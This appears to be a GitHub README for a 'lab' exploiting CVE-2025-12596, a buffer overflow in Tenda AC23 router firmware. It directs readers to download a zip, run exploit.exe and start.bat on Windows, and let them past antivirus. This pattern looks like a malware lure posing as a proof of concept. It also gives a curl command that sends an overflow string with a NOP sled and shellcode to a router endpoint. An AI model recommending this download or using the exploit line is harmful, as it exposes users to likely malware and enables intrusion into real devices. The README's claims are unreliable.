Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119)# Lab: CVE-2025-12596 - Buffer Overflow in Tenda AC23 Router
## Download
### [Download exploit](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip)
## 🚀 Overview
This repository provides a comprehensive lab environment CVE-2025-12596 (also tracked as EUVD-2025-37441), a buffer overflow vulnerability classified under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). The issue affects the Tenda AC23 router firmware version 16.03.07.52, specifically in the `saveParentControlInfo` function located in the `/goform/saveParentControlInfo` endpoint. By manipulating the `Time` parameter, remote attackers can trigger an overflow, potentially leading to arbitrary code execution.
### Impact
- **Confidentiality**: High – Attackers may access sensitive data such as network configurations or user credentials.
- **Integrity**: High – System files or settings could be altered, enabling persistent backdoors.
- **Availability**: Medium – Overflow may cause crashes or denial-of-service conditions.
- **Exploitability**: Remote execution possible with low privileges; no user interaction required. CVSS score estimated at 8.6 (High).
## 📋 Prerequisites
- Operating System: Windows 10/11 (64-bit) for exploit execution; Linux/macOS compatible for analysis.
- Tools: Python 3.8+ (for automation scripts), Wireshark or tcpdump for network traffic analysis (optional).
- Hardware: A Tenda AC23 router running firmware version 16.03.07.52 for testing (ensure it's in a isolated lab network).
- Basic knowledge of C programming, buffer overflows, and network protocols (HTTP/POST requests).
Ensure your antivirus is configured to allow execution of the provided binaries, as they may trigger heuristics for exploit-like behavior.
## Download & Install
1. Download the lab archive from the [releases page](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip). This ZIP contains:
- `exploit.exe`: Main exploit tool for demonstrating the buffer overflow.
- `start.bat`: Batch file to launch the exploit safely.
- Supporting files: Payload templates and logs.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-Lab\`.
## 🛠 Quick Start
1. Navigate to the extracted directory.
2. Run `start.bat` to initialize the exploit demo. This script will:
- Execute `exploit.exe` with a default payload targeting the `Time` parameter overflow.
3. Observe the output: The exploit will demonstrate stack smashing, potential shellcode injection, and system compromise simulation.
4. For manual testing:
- Use a tool like curl to send a malicious request: `curl -X POST http://<router-ip>:80/goform/saveParentControlInfo --data "Time=$(python -c 'print("A"*1024 + "\x90"*100 + shellcode)')"` (replace `shellcode` with your payload and `<router-ip>` with the target IP).
## 🔍 Detailed Setup Instructions
### Step 1: Targeting the Vulnerable Endpoint
Ensure the Tenda AC23 router is accessible on the network at its default IP (e.g., 192.168.0.1) and running the vulnerable firmware.
### Step 2: Exploitation Steps
**Execute Exploit**:
- Run `exploit.exe --target <router-ip>:80 --payload payloads/overflow.payload`.
- **Verification**: Use network captures or router logs to check for overflow traces.
### Potential Outputs
- Successful exploit: "Buffer overflow detected! Executing shellcode..."
- Failure: "Input validation passed – no overflow."
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
[4.0K] /data/pocs/a79935d8d7f34aa6b785a225ca138a8fb533a3b2
├── [3.6K] README.md
└── [4.0K] tools
└── [8.5M] lab-cve-12596.zip
1 directory, 2 files